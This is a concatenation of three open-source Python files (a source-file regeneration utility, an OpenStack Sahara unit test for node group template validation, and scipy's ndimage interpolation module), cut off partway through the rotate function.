# FileGenerator.py - implemented 2013 by Neil Hodgson [email protected]
# Released to the public domain.
# Generate or regenerate source files based on comments in those files.
# May be modified in-place or a template may be generated into a complete file.
# Requires Python 2.5 or later
# The files are copied to a string apart from sections between a
# ++Autogenerated comment and a --Autogenerated comment which are
# generated by the CopyWithInsertion function. After the whole string is
# instantiated, it is compared with the target file and if different the file
# is rewritten.
from __future__ import with_statement
import codecs, os, re, string, sys
lineEnd = "\r\n" if sys.platform == "win32" else "\n"
def UpdateFile(filename, updated):
""" If the file contents are different to updated then copy updated into the
file else leave alone so Mercurial and make don't treat it as modified. """
newOrChanged = "Changed"
try:
with codecs.open(filename, "r", "utf-8") as infile:
original = infile.read()
if updated == original:
# Same as before so don't write
return
os.unlink(filename)
except IOError: # File is not there yet
newOrChanged = "New"
with codecs.open(filename, "w", "utf-8") as outfile:
outfile.write(updated)
print("%s %s" % (newOrChanged, filename))
# Automatically generated sections contain start and end comments,
# a definition line and the results.
# The results are replaced by regenerating based on the definition line.
# The definition line is a comment prefix followed by "**".
# If there is a digit after the ** then this indicates which list to use
# and the digit and next character are not part of the definition
# Backslash is used as an escape within the definition line.
# The part between \( and \) is repeated for each item in the list.
# \* is replaced by each list item. \t, and \n are tab and newline.
# If there is no definition line then the first list is copied verbatim.
# If retainDefs then the comments controlling generation are copied.
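# A worked example of the syntax described above (comment prefix and list
# values are illustrative only): with commentPrefix "//" and
# lists[0] == ["Alpha", "Beta"], the definition line
#   //**\(\t\*,\n\)
# expands to "\tAlpha,\n\tBeta,\n", i.e. one indented "<item>," line per
# entry of the list.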
def CopyWithInsertion(input, commentPrefix, retainDefs, lists):
copying = 1
generated = False
listid = 0
output = []
for line in input.splitlines(0):
isStartGenerated = line.lstrip().startswith(commentPrefix + "++Autogenerated")
if copying and not isStartGenerated:
output.append(line)
if isStartGenerated:
if retainDefs:
output.append(line)
copying = 0
generated = False
elif not copying and not generated:
# Generating
if line.startswith(commentPrefix + "**"):
# Pattern to transform input data
if retainDefs:
output.append(line)
definition = line[len(commentPrefix + "**"):]
if (commentPrefix == "<!--") and (" -->" in definition):
definition = definition.replace(" -->", "")
listid = 0
if definition[0] in string.digits:
listid = int(definition[:1])
definition = definition[2:]
# Hide double slashes as a control character
definition = definition.replace("\\\\", "\001")
# Do some normal C style transforms
definition = definition.replace("\\n", "\n")
definition = definition.replace("\\t", "\t")
# Get the doubled backslashes back as single backslashes
definition = definition.replace("\001", "\\")
startRepeat = definition.find("\\(")
endRepeat = definition.find("\\)")
intro = definition[:startRepeat]
out = ""
if intro.endswith("\n"):
pos = 0
else:
pos = len(intro)
out += intro
middle = definition[startRepeat+2:endRepeat]
for i in lists[listid]:
item = middle.replace("\\*", i)
if pos and (pos + len(item) >= 80):
out += "\\\n"
pos = 0
out += item
pos += len(item)
if item.endswith("\n"):
pos = 0
outro = definition[endRepeat+2:]
out += outro
out = out.replace("\n", lineEnd) # correct EOLs in generated content
output.append(out)
else:
# Simple form with no rule to transform input
output.extend(lists[0])
generated = True
if line.lstrip().startswith(commentPrefix + "--Autogenerated") or \
line.lstrip().startswith(commentPrefix + "~~Autogenerated"):
copying = 1
if retainDefs:
output.append(line)
output = [line.rstrip(" \t") for line in output] # trim trailing whitespace
return lineEnd.join(output) + lineEnd
def GenerateFile(inpath, outpath, commentPrefix, retainDefs, *lists):
"""Generate 'outpath' from 'inpath'.
"""
try:
with codecs.open(inpath, "r", "UTF-8") as infile:
original = infile.read()
updated = CopyWithInsertion(original, commentPrefix,
retainDefs, lists)
UpdateFile(outpath, updated)
except IOError:
print("Can not open %s" % inpath)
def Generate(inpath, outpath, commentPrefix, *lists):
"""Generate 'outpath' from 'inpath'.
"""
GenerateFile(inpath, outpath, commentPrefix, inpath == outpath, *lists)
def Regenerate(filename, commentPrefix, *lists):
"""Regenerate the given file.
"""
Generate(filename, filename, commentPrefix, *lists)
def UpdateLineInFile(path, linePrefix, lineReplace):
lines = []
updated = False
with codecs.open(path, "r", "utf-8") as f:
for l in f.readlines():
l = l.rstrip()
if not updated and l.startswith(linePrefix):
lines.append(lineReplace)
updated = True
else:
lines.append(l)
contents = lineEnd.join(lines) + lineEnd
UpdateFile(path, contents)
def ReplaceREInFile(path, match, replace):
with codecs.open(path, "r", "utf-8") as f:
contents = f.read()
contents = re.sub(match, replace, contents)
UpdateFile(path, contents)
| bsd-2-clause |
egafford/sahara | sahara/tests/unit/service/validation/test_ng_template_validation_create.py | 3 | 15036 | # Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from sahara.service.api import v10 as api
from sahara.service.validations import node_group_template_schema as ngt_schema
from sahara.service.validations import node_group_templates as nt
from sahara.tests.unit.service.validation import utils as u
class TestNGTemplateCreateValidation(u.ValidationTestCase):
def setUp(self):
super(TestNGTemplateCreateValidation, self).setUp()
self._create_object_fun = nt.check_node_group_template_create
self.scheme = ngt_schema.NODE_GROUP_TEMPLATE_SCHEMA
api.plugin_base.setup_plugins()
def test_node_groups_create_required(self):
self._assert_create_object_validation(
data={
},
bad_req_i=(1, "VALIDATION_ERROR",
u"'name' is a required property")
)
self._assert_create_object_validation(
data={
'name': 'a'
},
bad_req_i=(1, "VALIDATION_ERROR",
u"'flavor_id' is a required property")
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
},
bad_req_i=(1, "VALIDATION_ERROR",
u"'hadoop_version' is a required property")
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1'
},
bad_req_i=(1, "VALIDATION_ERROR",
u"'node_processes' is a required property")
)
self._assert_create_object_validation(
data={
'name': "a",
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': []
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'node_processes: \[\] is too short')
)
def test_ng_template_create_v_names(self):
data = {
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode']
}
self._assert_valid_name_hostname_validation(data)
def test_ng_template_create_v_node_processes(self):
self._assert_create_object_validation(
data={
'name': "a",
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ["namenode", "namenode"]
},
bad_req_i=(1, 'INVALID_DATA',
'Duplicates in node processes have been detected')
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process']
},
bad_req_i=(1, 'INVALID_REFERENCE',
"Plugin doesn't support the following node processes: "
"['wrong_process']")
)
@mock.patch(
"sahara.service.validations.base.check_volume_availability_zone_exist")
@mock.patch("sahara.service.validations.base.check_volume_type_exists")
@mock.patch(
"sahara.service.validations.base.check_availability_zone_exist")
@mock.patch("sahara.service.validations.base.check_security_groups_exist")
def test_ng_template_create_v_right(self,
s_groups, a_zone, v_type, v_a_zone):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode',
'datanode',
'tasktracker',
'jobtracker'],
'image_id': '550e8400-e29b-41d4-a716-446655440000',
'node_configs': {},
'volumes_per_node': 2,
'volumes_size': 10,
'volume_type': 'fish',
'volumes_availability_zone': 'ocean',
'volume_mount_prefix': '/tmp',
'description': "my node group",
'floating_ip_pool': 'd9a3bebc-f788-4b81-9a93-aa048022c1ca',
'security_groups': ['cat', 'dog'],
'auto_security_group': False,
'availability_zone': 'here',
'is_proxy_gateway': False,
'volume_local_to_instance': False,
'is_public': False,
'is_protected': False
}
)
def test_ng_template_create_v_nulls(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode',
'datanode',
'tasktracker',
'jobtracker'],
'image_id': None,
'node_configs': None,
'volumes_size': None,
'volume_type': None,
'volumes_availability_zone': None,
'volume_mount_prefix': None,
'description': None,
'floating_ip_pool': None,
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'is_proxy_gateway': None,
'volume_local_to_instance': None,
'is_public': None,
'is_protected': None
}
)
def test_ng_template_create_v_minimum_ints(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process'],
'volumes_per_node': -1
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'volumes_per_node: -1(.0)? is less than the minimum '
u'of 0')
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process'],
'volumes_size': 0
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'volumes_size: 0(.0)? is less than the minimum of 1')
)
def test_ng_template_create_v_types(self):
default_data = {
'name': 'a', 'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode']
}
self._assert_types(default_data)
def test_ng_template_create_v_unique_ng(self):
data = {
'name': 'test',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode']}
self._assert_create_object_validation(
data=data,
bad_req_i=(1, 'NAME_ALREADY_EXISTS',
"NodeGroup template with name 'test' already exists")
)
def test_ng_template_create_v_flavor_exists(self):
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '1',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode']
},
bad_req_i=(1, 'NOT_FOUND',
"Requested flavor '1' not found")
)
def test_ng_template_create_validate_image(self):
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'image_id': '12345'
},
bad_req_i=(1, 'VALIDATION_ERROR',
"image_id: '12345' is not a 'uuid'")
)
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'image_id': '12345678-1234-1234-1234-123456789000'
},
bad_req_i=(1, 'INVALID_REFERENCE',
"Requested image "
"'12345678-1234-1234-1234-123456789000' "
"is not registered")
)
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'image_id': '813fe450-40d2-4acc-ade5-ea753a1bd5bc'
},
bad_req_i=(1, 'INVALID_REFERENCE',
"Requested image "
"'813fe450-40d2-4acc-ade5-ea753a1bd5bc' "
"doesn't contain required tags: "
"['0.1']")
)
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'image_id': '550e8400-e29b-41d4-a716-446655440000'
}
)
def test_ng_template_create_v_ng_configs(self):
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'node_configs': {
'wrong_target': {
u'mapreduce.task.tmp.dir': '/temp/'
}
}},
bad_req_i=(1, 'INVALID_REFERENCE',
"Plugin doesn't contain applicable "
"target 'wrong_target'")
)
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'node_configs': {
'general': {
's': 'a'
}
}
},
bad_req_i=(1, 'INVALID_REFERENCE',
"Plugin's applicable target 'general' doesn't "
"contain config with name 's'")
)
def test_ng_template_cinder(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process'],
'volumes_per_node': -1
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'volumes_per_node: -1(.0)? is less than the minimum '
u'of 0')
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process'],
'volumes_size': 0
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'volumes_size: 0(.0)? is less than the minimum of 1')
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['datanode', 'tasktracker'],
'volumes_per_node': 1,
'volumes_size': 1,
'volume_mount_prefix': '/mnt/volume'
}
)
data = {
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['datanode', 'tasktracker'],
'volumes_per_node': 1,
'volumes_size': 1,
'volume_mount_prefix': 'qwerty'
}
self._assert_create_object_validation(
data=data,
bad_req_i=(1, 'VALIDATION_ERROR', "volume_mount_prefix: 'qwerty' "
"is not a 'posix_path'")
)
def test_wrong_floating_ip_pool(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['datanode', 'tasktracker'],
'floating_ip_pool': 'network_bad'
},
bad_req_i=(1, 'NOT_FOUND', "Floating IP pool network_bad "
"not found")
)
def test_volumes_per_node_without_volumes_size(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['datanode', 'tasktracker'],
'volumes_per_node': 1
},
bad_req_i=(1, 'INVALID_REFERENCE', "You must specify a "
"volumes_size parameter")
)
| apache-2.0 |
tcheehow/MissionPlanner | Lib/site-packages/scipy/ndimage/interpolation.py | 55 | 25609 | # Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
import numpy
import _ni_support
import _nd_image
def _extend_mode_to_code(mode):
mode = _ni_support._extend_mode_to_code(mode)
return mode
def spline_filter1d(input, order=3, axis=-1, output=numpy.float64):
"""
Calculates a one-dimensional spline filter along the given axis.
The lines of the array along the given axis are filtered by a
spline filter. The order of the spline must be >= 2 and <= 5.
Parameters
----------
input : array_like
The input array.
order : int, optional
The order of the spline, default is 3.
axis : int, optional
The axis along which the spline filter is applied. Default is the last
axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array. Default is `numpy.float64`.
Returns
-------
return_value : ndarray or None
The filtered input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if order in [0, 1]:
output[...] = numpy.array(input)
else:
axis = _ni_support._check_axis(axis, input.ndim)
_nd_image.spline_filter1d(input, order, axis, output)
return return_value
def spline_filter(input, order=3, output = numpy.float64):
"""
Multi-dimensional spline filter.
For more details, see `spline_filter1d`.
See Also
--------
spline_filter1d
Notes
-----
The multi-dimensional filter is implemented as a sequence of
one-dimensional spline filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
"""
if order < 2 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if order not in [0, 1] and input.ndim > 0:
for axis in range(input.ndim):
spline_filter1d(input, order, axis, output = output)
input = output
else:
output[...] = input[...]
return return_value
def geometric_transform(input, mapping, output_shape=None,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True,
extra_arguments=(), extra_keywords={}):
"""
Apply an arbritrary geometric transform.
The given mapping function is used to find, for each point in the
output, the corresponding coordinates in the input. The value of the
input at those coordinates is determined by spline interpolation of
the requested order.
Parameters
----------
input : array_like
The input array.
mapping : callable
A callable object that accepts a tuple of length equal to the output
array rank, and returns the corresponding input coordinates as a tuple
of length equal to the input array rank.
output_shape : tuple of ints
Shape tuple.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
extra_arguments : tuple, optional
Extra arguments passed to `mapping`.
extra_keywords : dict, optional
Extra keywords passed to `mapping`.
Returns
-------
return_value : ndarray or None
The filtered input. If `output` is given as a parameter, None is
returned.
See Also
--------
map_coordinates, affine_transform, spline_filter1d
Examples
--------
>>> a = np.arange(12.).reshape((4, 3))
>>> def shift_func(output_coords):
... return (output_coords[0] - 0.5, output_coords[1] - 0.5)
...
>>> sp.ndimage.geometric_transform(a, shift_func)
array([[ 0. , 0. , 0. ],
[ 0. , 1.362, 2.738],
[ 0. , 4.812, 6.187],
[ 0. , 8.263, 9.637]])
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
_nd_image.geometric_transform(filtered, mapping, None, None, None,
output, order, mode, cval, extra_arguments, extra_keywords)
return return_value
def map_coordinates(input, coordinates, output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Map the input array to new coordinates by interpolation.
The array of coordinates is used to find, for each point in the output,
the corresponding coordinates in the input. The value of the input at
those coordinates is determined by spline interpolation of the
requested order.
The shape of the output is derived from that of the coordinate
array by dropping the first axis. The values of the array along
the first axis are the coordinates in the input array at which the
output value is found.
Parameters
----------
input : ndarray
The input array.
coordinates : array_like
The coordinates at which `input` is evaluated.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray
The result of transforming the input. The shape of the output is
derived from that of `coordinates` by dropping the first axis.
See Also
--------
spline_filter, geometric_transform, scipy.interpolate
Examples
--------
>>> import scipy.ndimage
>>> a = np.arange(12.).reshape((4, 3))
>>> a
array([[ 0., 1., 2.],
[ 3., 4., 5.],
[ 6., 7., 8.],
[ 9., 10., 11.]])
>>> sp.ndimage.map_coordinates(a, [[0.5, 2], [0.5, 1]], order=1)
[ 2. 7.]
Above, the interpolated value of a[0.5, 0.5] gives output[0], while
a[2, 1] is output[1].
>>> inds = np.array([[0.5, 2], [0.5, 4]])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=-33.3)
array([ 2. , -33.3])
>>> sp.ndimage.map_coordinates(a, inds, order=1, mode='nearest')
array([ 2., 8.])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=0, output=bool)
    array([ True, False], dtype=bool)
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
coordinates = numpy.asarray(coordinates)
if numpy.iscomplexobj(coordinates):
raise TypeError('Complex type not supported')
output_shape = coordinates.shape[1:]
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
if coordinates.shape[0] != input.ndim:
raise RuntimeError('invalid shape for coordinate array')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
_nd_image.geometric_transform(filtered, None, coordinates, None, None,
output, order, mode, cval, None, None)
return return_value
def affine_transform(input, matrix, offset=0.0, output_shape=None,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Apply an affine transformation.
The given matrix and offset are used to find for each point in the
output the corresponding coordinates in the input by an affine
transformation. The value of the input at those coordinates is
determined by spline interpolation of the requested order. Points
outside the boundaries of the input are filled according to the given
mode.
Parameters
----------
input : ndarray
The input array.
matrix : ndarray
The matrix must be two-dimensional or can also be given as a
one-dimensional sequence or array. In the latter case, it is assumed
        that the matrix is diagonal. A more efficient algorithm is then
applied that exploits the separability of the problem.
offset : float or sequence, optional
The offset into the array where the transform is applied. If a float,
`offset` is the same for each axis. If a sequence, `offset` should
contain one value for each axis.
output_shape : tuple of ints, optional
Shape tuple.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray or None
The transformed input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
matrix = numpy.asarray(matrix, dtype = numpy.float64)
if matrix.ndim not in [1, 2] or matrix.shape[0] < 1:
raise RuntimeError('no proper affine matrix provided')
if matrix.shape[0] != input.ndim:
raise RuntimeError('affine matrix has wrong number of rows')
if matrix.ndim == 2 and matrix.shape[1] != output.ndim:
raise RuntimeError('affine matrix has wrong number of columns')
if not matrix.flags.contiguous:
matrix = matrix.copy()
offset = _ni_support._normalize_sequence(offset, input.ndim)
offset = numpy.asarray(offset, dtype = numpy.float64)
if offset.ndim != 1 or offset.shape[0] < 1:
raise RuntimeError('no proper offset provided')
if not offset.flags.contiguous:
offset = offset.copy()
if matrix.ndim == 1:
_nd_image.zoom_shift(filtered, matrix, offset, output, order,
mode, cval)
else:
_nd_image.geometric_transform(filtered, None, None, matrix, offset,
output, order, mode, cval, None, None)
return return_value
def shift(input, shift, output=None, order=3, mode='constant', cval=0.0,
prefilter=True):
"""
Shift an array.
The array is shifted using spline interpolation of the requested order.
Points outside the boundaries of the input are filled according to the
given mode.
Parameters
----------
input : ndarray
The input array.
shift : float or sequence, optional
The shift along the axes. If a float, `shift` is the same for each
axis. If a sequence, `shift` should contain one value for each axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray or None
The shifted input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input)
shift = _ni_support._normalize_sequence(shift, input.ndim)
shift = [-ii for ii in shift]
shift = numpy.asarray(shift, dtype = numpy.float64)
if not shift.flags.contiguous:
shift = shift.copy()
_nd_image.zoom_shift(filtered, None, shift, output, order, mode, cval)
return return_value
def zoom(input, zoom, output=None, order=3, mode='constant', cval=0.0,
prefilter=True):
"""
Zoom an array.
The array is zoomed using spline interpolation of the requested order.
Parameters
----------
input : ndarray
The input array.
zoom : float or sequence, optional
The zoom factor along the axes. If a float, `zoom` is the same for each
axis. If a sequence, `zoom` should contain one value for each axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray or None
The zoomed input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
zoom = _ni_support._normalize_sequence(zoom, input.ndim)
output_shape = tuple([int(ii * jj) for ii, jj in zip(input.shape, zoom)])
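    # Recompute the per-axis scale from the rounded output shape so that the
    # first and last samples of the input map onto those of the output.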
zoom = (numpy.array(input.shape)-1)/(numpy.array(output_shape,float)-1)
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
zoom = numpy.asarray(zoom, dtype = numpy.float64)
zoom = numpy.ascontiguousarray(zoom)
_nd_image.zoom_shift(filtered, zoom, None, output, order, mode, cval)
return return_value
def _minmax(coor, minc, maxc):
if coor[0] < minc[0]:
minc[0] = coor[0]
if coor[0] > maxc[0]:
maxc[0] = coor[0]
if coor[1] < minc[1]:
minc[1] = coor[1]
if coor[1] > maxc[1]:
maxc[1] = coor[1]
return minc, maxc
def rotate(input, angle, axes=(1, 0), reshape=True,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Rotate an array.
The array is rotated in the plane defined by the two axes given by the
`axes` parameter using spline interpolation of the requested order.
Parameters
----------
input : ndarray
The input array.
angle : float
The rotation angle in degrees.
axes : tuple of 2 ints, optional
The two axes that define the plane of rotation. Default is the first
two axes.
reshape : bool, optional
If `reshape` is true, the output shape is adapted so that the input
array is contained completely in the output. Default is True.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray or None
The rotated input. If `output` is given as a parameter, None is
returned.
"""
input = numpy.asarray(input)
axes = list(axes)
rank = input.ndim
if axes[0] < 0:
axes[0] += rank
if axes[1] < 0:
axes[1] += rank
if axes[0] < 0 or axes[1] < 0 or axes[0] > rank or axes[1] > rank:
raise RuntimeError('invalid rotation plane specified')
if axes[0] > axes[1]:
axes = axes[1], axes[0]
